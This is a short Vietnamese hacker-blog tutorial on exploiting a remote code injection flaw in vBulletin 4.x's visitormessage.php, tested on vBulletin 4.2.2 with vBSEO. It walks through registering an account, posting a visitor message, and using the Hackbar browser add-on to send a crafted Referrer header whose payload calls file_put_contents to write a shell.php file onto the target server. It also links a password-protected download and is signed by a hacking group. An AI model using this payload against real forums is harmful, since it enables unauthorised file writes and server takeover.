Tut khai thác lỗi visitormessage.php Remote Code Injection vbb 4.x.x

Tuesday, March 17, 2015
Linkdownload: https://drive.google.com/file/d/0B5GXJ8MAIvQqSDVxbmVaaEV6alU/view
Pass unrar: quylevhb.blogspot.com

Test trên vbb 4.2.2 cài vbseo 3.6.0

Bước 1: Đăng ký tài khoản
Bước 2: Vào profile

[Hình: sshot-1.png]

Bước 3: Gửi tin nhắn

[Hình: sshot-2.png]

Bước 4: Mở Hackbar
- Khung load URL điền: 

http:/victim.net/visitormessage.php?do=message

- Khung Referrer điền: 

http://victim.net/members/quylevhb.html?a=$stylevar[${${file_put_contents("shell.php","hacked by Quy Le - VHB Group")}}]"


Bước 5: Xem video nhé các thím =]]]]]


Tut by Quỷ Lệ - VHB Group
Chia sẻ bài viết ^^
Other post

All comments [ 0 ]


Your comments